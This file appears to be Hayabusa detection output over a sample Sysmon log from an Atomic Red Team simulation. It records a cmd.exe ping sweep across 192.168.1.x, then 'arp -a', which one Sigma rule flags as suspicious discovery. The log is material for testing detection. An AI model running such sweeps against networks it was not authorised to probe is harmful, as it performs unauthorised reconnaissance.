+2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.213 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D961-5D31-0000-0010891F3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.214 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2892 | PGUID: 747F3D96-D961-5D31-0000-001075223700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.215 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-D962-5D31-0000-001061253700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.216 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D962-5D31-0000-0010292E3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.217 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1996 | PGUID: 747F3D96-D963-5D31-0000-001016313700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.218 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D963-5D31-0000-001002343700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.219 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3896 | PGUID: 747F3D96-D963-5D31-0000-0010EF363700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.220 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6856 | PGUID: 747F3D96-D964-5D31-0000-0010DB393700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.221 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4932 | PGUID: 747F3D96-D965-5D31-0000-0010C73C3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.222 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1220 | PGUID: 747F3D96-D965-5D31-0000-0010B53F3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.223 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-D965-5D31-0000-0010A1423700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.224 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D966-5D31-0000-00108D453700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.225 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6632 | PGUID: 747F3D96-D967-5D31-0000-00107C483700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.226 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5844 | PGUID: 747F3D96-D967-5D31-0000-0010BB513700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.227 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6396 | PGUID: 747F3D96-D968-5D31-0000-001001553700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.228 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1452 | PGUID: 747F3D96-D968-5D31-0000-0010F3573700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.229 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-D969-5D31-0000-0010DF5A3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.230 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D969-5D31-0000-0010CB5D3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.231 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D96A-5D31-0000-0010B7603700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.232 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D96A-5D31-0000-0010A3633700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.233 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D96B-5D31-0000-001090663700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.234 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D96B-5D31-0000-00107C693700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.235 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D96C-5D31-0000-00106A6C3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.236 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-D96C-5D31-0000-0010BA763700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.237 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3228 | PGUID: 747F3D96-D96D-5D31-0000-0010A7793700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.238 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D96D-5D31-0000-0010937C3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.239 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D96D-5D31-0000-0010827F3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.240 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D96E-5D31-0000-00106E823700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.241 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D96F-5D31-0000-00105A853700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.242 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3556 | PGUID: 747F3D96-D96F-5D31-0000-0010C78F3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.243 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3788 | PGUID: 747F3D96-D970-5D31-0000-0010B4923700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.244 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D970-5D31-0000-0010A0953700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.245 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2700 | PGUID: 747F3D96-D971-5D31-0000-00108C983700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.246 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 352 | PGUID: 747F3D96-D971-5D31-0000-0010789B3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.247 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3120 | PGUID: 747F3D96-D972-5D31-0000-00106BA43700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.248 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6976 | PGUID: 747F3D96-D972-5D31-0000-001057A73700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.249 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D973-5D31-0000-0010A3AA3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.250 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5100 | PGUID: 747F3D96-D973-5D31-0000-00108FAD3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.251 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D974-5D31-0000-00107BB03700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.252 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D974-5D31-0000-001068B33700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.253 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D974-5D31-0000-001006BD3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.254 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1624 | PGUID: 747F3D96-D975-5D31-0000-001099C23700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6412 | PGUID: 747F3D96-D976-5D31-0000-00104AC63700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6292 | PGUID: 747F3D96-D976-5D31-0000-0010DBCC3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Network Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: arp -a | Process: C:\Windows\System32\ARP.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D976-5D31-0000-001034CF3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
